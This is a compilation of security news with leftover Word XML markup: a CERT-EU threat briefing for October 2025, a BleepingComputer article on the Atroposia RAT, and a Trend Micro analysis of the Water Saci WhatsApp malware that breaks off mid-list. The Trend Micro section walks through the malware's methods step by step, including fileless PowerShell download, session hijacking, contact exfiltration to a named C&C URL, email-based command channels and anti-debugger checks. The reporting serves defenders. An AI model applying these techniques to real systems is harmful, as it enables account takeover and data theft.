npm package posing as Anthropic's Claude tool. Koi researchers observed a supply chain attack in which a self-propagating worm, GlassWorm, compromised Microsoft's VSCode marketplace. Europe Cyber policy and law enforcement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Security of Cables: Commission publishes landmark report and funding for Cable Hubs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 October 23, the European Commission published a landmark report assessing the resilience of Europe's submarine data-cable infrastructure, identifying seven main risk scenarios, guidance for stress-testing and launching a 10 million euros call under the Digital Europe Programme to establish regional "cable hubs" to monitor threats and reinforce resilience. guidance link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Joint operation SIMCARTEL dismantles fraudulent SIM box operation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 October 10, Europol officials alongside Eurojust, Austria, Estonia and Latvia, collaborated to dismantle a criminal network engaged in fraudulent SIM box operations. They arrest five Latvian cybercriminals, took down five servers and seized 1.200 SIM box devices alongside 40.000 active SIM cards. Investigators attributed over 1.700 cyber fraud cases in Austria and Latvia to the criminal network. takedown link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Spain dismantles GXC Team cybercrime network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 October 9, Spain's Guardia Civil announced they dismantled the GXC Team cybercrime group, led by a 25-year-old Brazilian known as "GoogleXcoder." The gang sold AI-powered phishing kits, Android malware, and voice-scam tools via Telegram, targeting banks and companies worldwide. Coordinated raids across Spain seized electronic devices, stolen cryptocurrency, and shut down scam channels. takedown link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Azerbaijan-Slovakia cybersecurity cooperation talks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 October 8, Azerbaijan and Slovakia met to discuss cybersecurity cooperation, focusing on critical infrastructure, with options for experience-sharing and joint public-private projects. On October 9, military officials also met to explore technical and training exchanges, including cybersecurity for weapons systems and IT, with mention of AI- enabled cybersecurity tools. cooperation link Cyberespionage &amp; prepositioning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China-linked Salt Typhoon and Flax Typhoon collaborating in Premier Pass-as- a-Service scheme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 October 22, Trend Micro revealed a "Premier Pass-as-a-Service" collaborative scheme between China-aligned groups Salt Typhoon and Flax Typhoon, with one providing access, the other exploiting it. Victims include government agencies, aerospace and defence contractors, and technology firms across Asia and Europe. This partnership-as-a-service model complicates attribution and detection, prompting Trend Micro to propose a four-tier framework to analyse such operations. china link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China-linked Salt Typhoon targets European telecom organisation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On October 20, Darktrace reported that the China-linked cyberespionage group SaltTyphoon targeted a European telecommunications organisation in July 2025, beginning with a compromise of a Citrix NetScaler appliance. They used DLL sideloading via legitimate antivirus software and multi- channel C2 infrastructure to execute the backdoor SNAPPYBEE and conduct stealthy exfiltration. china link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North Korea-linked Lazarus Group targets the UAV sector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 October 23, ESET revealed that the North Korea-aligned APT group Lazarus Group resumed its "Operation DreamJob" campaign targeting European defence firms, especially in the unmanned aerial vehicle (UAV) sector. Their goal was likely to steal proprietary UAV-related technology and know-how using job-offer lures and trojanised open-source tools. north korea link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Graphite spyware targets Italian businessman and journalists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 October 9, Irpi Media revealed that Israeli-made Graphite spyware, developed by Paragon Solutions, was used in highly targeted zero-click attacks against at least seven Italian individuals, including businessman Francesco Gaetano Caltagirone, journalists, and activists. The campaign's origin remains unclear, with the possible involvement of state actors. psoa link Disruption &amp; destruction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Latvian state websites hit by cyberattack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 October 2, several Latvian state websites, including those on the gov.lv platform and eParaksts.lv, experienced a cyberattack that caused a significant service outage. The Latvian State Radio and Television Centre (LVRTC) confirmed that the affected websites were fully restored after approximately one hour and 20 minutes. public administration link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Dutch Public Health Institute RIVM shuts website following cyberattack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 October 14, the Dutch Public Health Institute (RIVM) shut down its website around 11:15 a.m. after detecting a cyberattack exploiting a vulnerability in an outdated web-form plugin. The site later came back online, though data submission forms remained temporarily disabled while security gaps were addressed. health link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Hacktivists tamper with decoy water plant after rapid web-layer breach</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 October 9, Forescout reported that pro-Russia hacktivists "TwoNet" breached a decoy water-treatment HMI with default credentials. Within 26 hours of initial access, they used an old XSS vulnerability (CVE-2021- 26829) to broadcast "Hacked by Barlati," disabled logs, alarms, and removed PLCs from data sources and changed their setpoints. water link Data exposure and leaks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Stormous cybercrime group breached France Travail with an automated credential stuffing attack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 October 27, Stormous cybercrime group reportedly breached France Travail with an automated credential stuffing attack. The group allegedly leveraged stolen credentials and exploited a vulnerability in France Travail's backend PDF generation API to download victim documents. They also claimed to have automatically exfiltrated the data of 30.257 user accounts which included identification, bank information, work history, and salary records. labour link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Data breach affecting Swedish national electric grid operator Svenska kraftn"at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 October 25, Svenska kraftn"at identified a data breach involving an external file transfer system but stated that mission-critical systems or the transmission of electricity were unaffected. The threat actor "Everest" claimed responsibility for the breach, alleging they stole 280GB of data. energy link World Cyber policy and law enforcement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65 countries sign first UN Cybercrime Treaty, marking global milestone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 October 25, 65 countries signed the first United Nations treaty to combat cybercrime, marking a milestone for global digital cooperation. The Convention against Cybercrime establishes a universal framework for investigating and prosecuting online offences, from ransomware to image- based abuse, enhancing cross-border evidence sharing and law enforcement collaboration, while safeguarding privacy and human rights. cooperation link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Russia reportedly actively managing cybercriminal groups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 October 23, Recorded Future reported that the Russian government has moved from tolerating cybercriminal groups to actively managing them. Since 2023, Russian authorities have coordinated arrests, leveraged hackers as geopolitical tools, and selectively enforced laws to balance foreign pressure and domestic interests, turning cybercrime into both a strategic asset and a controlled liability within Russia's evolving state- cybercriminal ecosystem. russia link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Russia enforces 24-hour block on foreign SIMs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 October 6, Russian mobile users reported that foreign SIMs went dark for 24 hours as authorities enforced a policy blocking non-Russian SIM cards that register inside Russia, reportedly to disrupt drone operators. Blocks trigger on network registration and can reapply after inactivity; carriers were instructed to implement the measure. The disruption also affected neighbouring CIS countries' users. russia link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Revelations on Group 78, a secret US Cybercrime Unit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 October 16, Le Monde revealed that a secret US unit called Group 78 operates with the mission to combat cybercrime. The unit was introduced in November 2024 to European police and judicial authorities, proposing strategies including covert action in Russia to force cybercriminal actors to relocate and be apprehended. united states link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Project Nimbus included secret 'wink' mechanism to alert Israel on data disclosures to foreign authorities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On October 29, several newspapers jointly reported that under Project Nimbus, a cloud contract established in 2021, Israel required Google and Amazon Web Services to send "coded" payments, a so-called "winking" mechanism, to alert Israel when either firm disclosed Israeli data to foreign authorities under a gag order. They were also allegedly </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>barred from suspending Israel's access to their cloud services, even if terms of service were breached. israel link Cyberespionage &amp; prepositioning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China-linked threat actor UTA0388 leveraging LLMs in global spearphishing operations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 October 8, Volexity reported on spearphishing campaigns from China- linked threat actor UTA0388. The threat actor sent e-mails in several languages, including English, Chinese, Japanese, French, and German. The e- mails contained a link to a malicious ZIP file containing Govershell malware. Volexity assessed that UTA0388 is very likely leveraging Large Language Models in their operations. china link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ArcGIS turned into a web shell in an incident attributed to China-linked Flax Typhoon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 October 14, ReliaQuest reported that the China-linked APT Flax Typhoon compromised an ArcGIS system, a geographic information system used to manage and analyse spatial data. They converted a trusted Java server object extension into a persistent web shell. They used a hardcoded key and embedded it in backups, maintaining over a year of covert access, enabling command execution, lateral movement, and credential harvesting across multiple hosts. china link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Chinese MSS accuses the US NSA of targeting its National Time Service Center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 October 19, the Chinese Ministry of State Security reported that the US National Security Agency targeted its National Time Service Center. They reportedly found evidence dating back to at least March 2022 in which the NSA allegedly exploited a vulnerability in the messaging service of a foreign smartphone brand to access staff members' phones. china united states link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Russia-linked Coldriver delivers new malware using ClickFlix and Captcha lure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 October 20, Google Threat Intelligence reported on the Russia-linked group Coldriver deploying a new malware chain that combines the ClickFix technique with a Captcha lure. Throughout 2025, multiple threat actors, some state-sponsored, have adopted ClickFix. russia link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Callisto's new multi-stage ClickFix campaign targeting members of Russian civil society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 September 24, Zscaler ThreatLabz reported a multi-stage ClickFix phishing campaign attributed with moderate confidence to Russia-linked COLDRIVER (Callisto). The operation targeted Russian civil society, deploying the BAITSWITCH downloader and SIMPLEFIX backdoor to enable persistence, reconnaissance, and data exfiltration. russia link Cybercrime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LockBit ransomware returns with new 5.0 variant, targeting global organisations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 October 23, Check Point reported that the LockBit ransomware group has reemerged after its early 2024 disruption, launching new attacks across Europe, America, and Asia. A dozen organisations were targeted in September, half by the new LockBit 5.0 "ChuongDong" variant, which features faster encryption, stronger evasion, and cross-platform capability. russia link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Clop ransomware targets Oracle E-Business Suite users with extortion e-mails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 October 1 and 3, Bleeping Computer reported that a Clop ransomware campaign sent extortion e-mails to executives and IT staff at multiple companies, claiming theft of Oracle E-Business Suite (EBS) data and threatening leaks unless paid. Oracle linked the campaign to vulnerabilities patched in its July 2025 Critical Patch Update, advising customers to apply updates to prevent potential exploitation. No confirmed breaches were reported. russia link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Microsoft disrupts ransomware attacks targeting Teams users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early October 2025, Microsoft disrupted a ransomware campaign enacted by cybercriminal group Vanilla Tempest (aka Vice Spider). Microsoft revoked over 200 certificates that the threat actor had fraudulently signed and used in fake Teams setup files to deliver Oyster backdoor and Rhysida ransomware. link Data exposure and leaks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F5 breach exposes BIG-IP source code and undisclosed flaws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 October 15, F5 disclosed a nation-state intrusion first detected on August 9 that maintained long-term access to its BIG-IP product development and engineering knowledge platforms. F5 reported no supply-chain impact or malicious code changes and no evidence of exploitation to date. The disclosure was delayed at the US government's request. link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Crimson Collective claims Red Hat breach and data theft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 October 2, threat group Crimson Collective claimed to have breached Red Hat's private repositories, stealing 570GB of internal data including sensitive customer reports. Red Hat confirmed a consulting-related security incident but did not verify the group's claims. The alleged stolen data reportedly covers major global organisations across multiple sectors. link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ShinyHunters launches Salesforce data leak site to extort 39 victims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 October 3, cybercrime group ShinyHunters reportedly launched a data leak site to publicly extort 39 companies impacted by Salesforce breaches. The site includes data samples from victims, warning them to act before an October 10 deadline to prevent full disclosure. The group claimed to have stolen approximately 1.5 billion Salesforce records using compromised Salesloft Drift OAuth tokens. link Opportunistic</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VMware zero-day CVE-2025-41244 exploited by China-linked UNC5174</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 September 29, 2025, Broadcom disclosed CVE-2025-41244, a local privilege escalation vulnerability in VMware's guest service discovery features. NVISO identified zero-day exploitation of this flaw by the Chinese state- sponsored group UNC5174 since mid-October 2024. The vulnerability affects both VMware Tools and VMware Aria Operations, enabling unprivileged users to execute code in privileged contexts. china link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Zimbra zero-day vulnerability exploited via malicious iCalendar files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 September 30, Strikeready reported that attackers exploited a Zimbra XSS (CVE-2025-27915) zero-day via oversized .ICS iCalendar files containing obfuscated JavaScript, launching strikes from early January and spoofing the Libyan Navy to target a Brazilian military organisation. The payload harvested credentials, e-mails, contacts, added mail-forwarding filters, exfiltrated data periodically. Zimbra patched the flaw on January 27 while stating exploitation does not appear to be widespread. link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GlassWorm supply chain worm compromises IDE marketplaces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 October 18, Koi researchers uncovered GlassWorm compromising OpenVSX and VSCode extensions using invisible Unicode to hide code and Solana blockchain C2 with Google Calendar fallback. The threat actor steals GitHub, npm, Git and OpenVSX credentials, deploys RAT features (SOCKS proxy, HVNC), targets crypto wallets, and self-propagates via stolen accounts. At least seven extensions and roughly 35.800 installs were affected; several remained active. link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PhantomRaven: malicious npm packages execute credential-stealing malware via hidden dependencies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 October 29, Koi Security reported the PhantomRaven campaign, in which an unknown threat actor distributed 126 malicious Node Package Manager (npm) packages globally. The malware concealed itself in remote dynamic dependencies to evade detection, harvesting developer credentials and CI/CD secrets. Over 86.000 downloads were recorded, impacting corporate networks, cloud environments, and individual developers through automated execution during package installation. link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Typosquatted npm packages execute credential stealer on install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Socket.dev reported 10 malicious typosquatted npm packages imitating popular libraries. The packages run automatically during npm install via postinstall, show a fake Captcha, fingerprint the system, and fetch a 24 MB cross-platform binary called data_extracter. The binary steals browser passwords, SSH keys, tokens and other secrets from developer machines on Windows, Linux and macOS, then exfiltrates the data to attacker infrastructure. link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Malicious npm package impersonates Claude Code to exfiltrate data via C2</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 October 27, Getsafety uncovered a fake npm package posing as Anthropic's Claude tool. Published since August with 19 versions, it installs a look- alike "claude" command that steals keys, profiles the device, and plants files. It then taps into real Claude traffic, capturing prompts and account data and sending them to a rogue server. link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Conclusions or attributions made in this document merely reflect what publicly available sources report. They do not reflect our stance. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>↩</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>CERT-EU 2025.11.03 20:43</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://cert.europa.eu/publications/threat-intelligence/cb25-11/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>New Atroposia malware comes with a local vulnerability scanner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Bill Toulas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October 28, 2025 09:15 AM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new malware-as-a-service (MaaS) platform named Atroposia provides cybercriminals a remote access trojan that combines capabilities for persistent access, evasion, data theft, and local vulnerability scanning.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malware is available for a $200 monthly subscription that unlocks advanced features such as hidden remote desktop, file system control, data exfiltration, clipboard theft, credential theft, cryptocurrency wallet theft, and DNS hijacking.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Atroposia was discovered by researchers at data security company Varonis, who warned that it's the latest example of an easy-to-use, affordable "plug and play" toolkit, alongside SpamGPT and MatrixPDF.</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Atroposia overview</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Atroposia is a modular RAT that communicates with its command-and-control (C2) infrastructure over encrypted channels and can bypass the User Account Control (UAC) protection to increase privileges privilege on Windows systems.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the researchers, it can maintain persistent, stealthy access on infected hosts, and its main capabilities include: HRDP Connect module that spawns a covert desktop session in the background, allowing an attacker to open apps, view documents and email, and interact with the user's session without any visible indication. Varonis says standard remote-access monitoring can fail to detect it.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Explorer-style file manager that allows remote file browsing copying, deleting, and execution capabilities. A grabber component looks for specific files, filtering them based on extension or a keyword, compresses the data into password-protected ZIP archives, and exfiltrates it using in- memory techniques to minimize traces.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Stealer module targets saved logins, crypto wallets, and chat files, while a clipboard manager captures everything copied in real time (passwords, API keys, wallet addresses) and presents a history to the attacker.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Host-level DNS hijack module that maps domains to attacker IPs so the victim is silently routed to rogue servers, enabling phishing, MITM, fake updates, ad or malware injection, and DNS-based exfiltration.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Built-in local vulnerability scanner that audits missing patches, unsafe settings, and vulnerable software, returning a score that allows attackers to prioritize exploits, demonstrating the RAT's modular, plugin-based workflow.</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researchers say that the vulnerability check "is dangerous in corporate environments because the malware might find an outdated VPN client or an unpatched privilege escalation bug." This can be easily used to gain deeper access.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Varonis' researchers say the module checks for missing patches, insecure settings, and outdated software versions. The function may also be used to find nearby systems that can be exploited.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emergence of Atroposia adds yet another MaaS option for cybercriminals, lowering the technical barrier and enabling low-skilled threat actors to execute effective campaigns.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 mitigate the risk, users are advised to download software only from official sites and reputable sources, avoid pirated software and torrents, skip promoted search results, and never execute commands they find online that they don't understand.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Picus Blue Report 2025 is Here: 2X increase in password cracking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46% of environments had passwords cracked, nearly doubling from 25% last year.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Get the Picus Blue Report 2025 now for a comprehensive look at more findings on prevention, detection, and data exfiltration trends. Get the Blue Report 2025</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>BleepingComputer 2025.10.28 19:08</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.bleepingcomputer.com/news/security/new-atroposia-malware-comes-with-a-local-vulnerability-scanner/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Active Water Saci Campaign Spreading Via WhatsApp Features Multi-Vector Persistence and Sophisticated C&amp;C</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Continuous investigation on the Water Saci campaign reveals innovative email-based C&amp;C system, multi-vector persistence, and real-time command capabilities that allow attackers to orchestrate coordinated botnet operations, gather detailed campaign intelligence, and dynamically control malware activity across multiple infected machines.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Jeffrey Francis Bonaobra, Joe Soares, Emmanuel Panopio Oct 27, 2025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Key takeaways: Further investigation into the active Water Saci campaign shows a new attack chain that utilizes an email-based C&amp;C infrastructure, employs multi- vector persistence for resilience, and incorporates advanced checks to evade analysis and restrict activity to specific targets.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The new attack chain also features a sophisticated remote command-and- control system that allows threat actors real-time management, including pausing, resuming, and monitoring the malware's campaign, effectively converting infected machines into a botnet tool for coordinated, dynamic operations across multiple endpoints.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Trend Vision OneTM detects and blocks the IoCs discussed in this blog. Trend Micro customers can also access tailored hunting queries, threat insights, and intelligence reports to better understand and proactively defend against this campaign. In addition, Trend customers are protected from the Water Saci campaign via the specific rules and filters listed at the end of this blog entry.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TrendTM Research is continuously tracking the aggressive malware campaign it identified as Water Saci, which uses WhatsApp as its primary infection vector. In our previous blog, the Water Saci campaign, with its malware identified as SORVEPOTEL, automatically distributes the same malicious ZIP file to all contacts and groups associated with the victim's compromised account for rapid propagation.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recent activity points to the emergence of a new infection chain that diverges from previously discussed .NET-based methods. On October 8, 2025, Trend Research analysis revealed file downloads originating from WhatsApp web sessions. Closer examination shows that instead of employing .NET binaries, the new chain leverages script-based techniques, orchestrating payload delivery through a combination of Visual Basic Script (VBS) downloaders and PowerShell (PS1) scripts. The following sections provide a detailed technical analysis of this evolving infection mechanism. Technical Analysis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 New Water Saci attack chain observed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 Research analysis revealed suspicious file downloads initiated through WhatsApp Web, specifically files named Orcamento-2025*.zip.</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2. Downloaded Orcamento-2025*.zip files as seen in Vision One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infection chain is initiated when a user downloads and extracts the ZIP archive, which includes an obfuscated VBS downloader named Orcamento.vbs. This VBS downloader issues a PowerShell command that carries out fileless execution via New-Object Net.WebClient to download and execute a PowerShell script named tadeu.ps1 directly in memory.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3. Deobfuscated Orcamento.vbs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The downloaded PowerShell script is used to hijack WhatsApp Web sessions, harvest all contacts from the victim's account, and automatically distribute malicious ZIP files to the said contacts while maintaining persistent command </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>and control communication for large-scale social engineering campaigns. tadeu.ps1 a.k.a. whatsapp_automation_v6_robust.ps1</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malware begins its sophisticated attack by displaying a deceptive banner claiming to be "WhatsApp Automation v6.0", immediately masking its malicious intent behind the guise of legitimate software. Investigation shows the consistent use of Portuguese, which suggest the threat actor's focus on Brazil.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4. Deceptive banner displayed by tadeu.ps1</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Upon initialization, it generates a unique session identifier and establishes contact with its command-and-control (C&amp;C) infrastructure at hxxps://miportuarios[.]com/sisti/config[.]php to download operational parameters including target lists, message templates, and timing configurations.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5. Function used to download config from C&amp;C server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If the C&amp;C server is unreachable, the malware seamlessly falls back to hardcoded default settings, ensuring the attack proceeds regardless of network conditions.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6. Hardcoded backup configuration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creates a temporary workspace in C:\temp, downloads the latest WhatsApp automation library (WA-JS) from GitHub, and retrieves a malicious ZIP payload and saves it as Bin.zip in C:\temp.</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7. Downloading the WhatsApp automation library and the ZIP payload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WhatsApp web browser hijacking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Similar to how the previous attack chain hijacks WhatsApp Web browser sessions, the malware checks the installed Chrome version and downloads the appropriate ChromeDriver for browser automation. It then installs the Selenium PowerShell module, enabling automated browser tasks on the victim's machine.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8. Checking of installed Chrome version and downloading of ChromeDriver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9. Installing Selenium PowerShell module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terminating any existing Chrome processes and clearing old sessions to ensure clean operation, the malware copies the victim's legitimate Chrome profile data to its temporary workspace. This data includes cookies, authentication tokens, and the saved browser session. This technique allows the malware to bypass WhatsApp Web's authentication entirely, gaining immediate access to the victim's WhatsApp account without triggering security alerts or requiring QR code scanning.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10. Terminating Chrome processes and sessions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11. Copying of the victim's legitimate Chrome profile data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the hijacked session in place, the malware launches Chrome with specific automation flags designed to evade detection and inject the WA-JS library for WhatsApp control.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12. Configuring Chrome with specific automation flags for defense evasion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13. WA-JS library injection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malware then systematically harvests all WhatsApp contacts using sophisticated JavaScript filtering to exclude specific number patterns while collecting names and phone numbers. The harvested contact list is immediately exfiltrated to the C&amp;C server.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14. WhatsApp contact harvesting and filtering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15. Sending of contact list to C&amp;C server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Remote control mechanism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malware implements a sophisticated remote C&amp;C system that allows attackers to pause, resume, and monitor the malware's spreading campaign in real-time enabling coordinated control across infected machines, turning the malware into a botnet tool capable of stopping and starting its activity based on attacker commands.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malware sends GET requests to miportuarios.com/sisti/config.php?chave=envio_ativo before every contact and during message delays, where the C&amp;C server responds with JSON data containing {"success": true, "data": {"valor": "true/false"}}: if the valor field is "false" the malware immediately pauses all operations, but if "true," it continues spreading, and includes a built-in fail-safe that defaults to continuing operations if the C&amp;C server becomes unreachable.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16. Remote control mechanism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When the C&amp;C server instructs the malware to pause, it enters a continuous polling loop that checks the server status every 30 seconds while maintaining a verification counter for tracking, logging all pause/resume events back to the C&amp;C server, and immediately resuming the spreading of the campaign the moment the server sends a "continue" command, allowing attackers real-time operational control to coordinate timing across multiple infected machines and respond instantly to detection threats.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17. Persistent polling loop system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 maintain robust and responsive control, the malware performs remote status checks at several key stages throughout its lifecycle: Distribution initiation check. Before starting the campaign, the malware contacts the C&amp;C server to determine if distribution should begin.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Per-contact verification. Prior to processing each contact, it verifies with the server for any remote pause commands, giving attackers precise control over the spreading process.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Delay interval monitoring. During wait times between sending messages, the malware repeatedly checks for pause instructions, ensuring it can instantly suspend or resume operations as needed.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Coordinated distribution management. These control points collectively allow attackers to manage the distribution in real time, making the malware highly adaptable and coordinated.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Automated ZIP file distribution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malware converts the downloaded ZIP file at C:\temp\Bin.zip into base64 encoding to enable transmission through WhatsApp's messaging system, then generates randomized filenames like "Orcamento-202512345678.zip" using the configurable prefix and 8-digit random numbers.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18. Base64 encoding of ZIP file named Orcamento-2025*.zip</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malware iterates through every harvested contact, checking for remote pause commands before each contact, then personalizes greeting messages by replacing template variables with time-based greetings and contact names.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19. Contact processing loop</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each contact, the malware injects JavaScript code into WhatsApp Web that converts base64 data back to binary, creates File objects, and executes a three-step automated sequence: greeting message, malicious file, and closing message.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20. JavaScript used to send messages via WhatsApp</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malware generates detailed campaign statistics and sends them back to the C&amp;C server, giving threat actors insight into success rates, victim system profiles, and lists of successfully contacted targets. This intelligence allows attackers to accurately measure campaign performance, orchestrate actions across multiple infected machines, and strategize future targeted attacks using the gathered data.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SORVEPOTEL Backdoor: Orcamento.vbs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Anti-analysis mechanisms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malware also does comprehensive security checks designed to prevent analysis and limit execution to intended targets. The language verification system ensures execution only on Portuguese-language systems.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21. Language verification to ensure Portuguese systems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anti-analysis capabilities extend to debugger detection, actively scanning for common analysis tools such as ollydbg.exe, idaq.exe, x32dbg.exe, x64dbg.exe, windbg.exe, processhacker.exe, and procmon.exe. If any of these checks are satisfied, the malware employs a sophisticated self- destruct mechanism that creates a batch file to delete itself and execute cleanup operations.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22. Self-destruct mechanism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Before establishing persistence, the malware implements a WMI-based mutex mechanism to prevent multiple instances from running simultaneously. This implementation uses WMI process enumeration rather than traditional Windows mutex objects, querying for wscript.exe and cscript.exe processes and checking their command lines for the service name. If more than one instance is detected, the malware exits to prevent conflict.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23. Singe instance enforcement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Persistence mechanisms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malware implements a multi-vector persistence strategy that ensures survival across system reboots and user sessions. The auto-installation routine establishes a foothold through both registry modifications and scheduled task creation using a dropped copy of itself named WinManagers.vbs saved in C:\ProgramData\WindowsManager\.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24. AutoInstall persistence mechanism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25. Persistence mechanism as seen in Vision One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Dual-channel communication architecture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most sophisticated aspect of the backdoor is its email-based C&amp;C infrastructure. Rather than relying on traditional HTTP-based communication, the malware leverages IMAP connections to terra.com.br email accounts using hardcoded email credentials to connect to the email account and retrieve commands.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26. Attackers get server URLs via email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email parsing system extracts multiple types of URLs from email content: data: URLs for primary C&amp;C server endpoints backup: URLs for failover C&amp;C infrastructure ps: URLs for PowerShell payload delivery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27. Email channel flow for C&amp;C server retrieval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Besides the email stated in figure 27, it was also observed that the attackers used other emails with different domains and passwords.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28. The other emails used by the attackers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Apart from hardcoded email credentials, attackers also used other emails; monitoring also showed that they later included multi-factor authentication (MFA) to prevent unauthorized access to these accounts. However, this likely introduced operational delays since each login required manual input of an authentication code, likely prompting the deployment of new email accounts to streamline their activities.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29. Attackers were observed to use multi-factor authentication (MFA) to prevent unauthorized access to the emails they used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30. Email-based C&amp;C server configurations retrieval for the next step attack chain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Once the backdoor obtains C&amp;C server URLs from the email channel, it transitions to an aggressive HTTP-based polling system that forms the backbone of its remote access capabilities. Every five seconds, the malware sends HTTP POST requests to the extracted C&amp;C servers, querying for pending commands using the action parameter get_commands.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31. Sending of HTTP POST requests to the C&amp;C servers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When the backdoor receives a command, it utilizes the ProcessarComando() function to handle its execution. This function begins with an anti- duplicate mechanism, using timer-based tracking to ignore repeated commands within a 30-second window. If the command is unique, it parses the instruction to determine the action and any parameters. The malware then routes the command to the appropriate handler, enabling it to perform tasks such as system information collection, executing local or PowerShell commands, managing files and processes, taking screenshots, or controlling system power states.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32. Function used to process backdoor commands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Once the malware establishes a foothold on the compromised system, it can receive and perform a wide range of instructions sent by its C&amp;C server, such as the following: Command Description INFO Gathers comprehensive system information including OS version, CPU details, computer 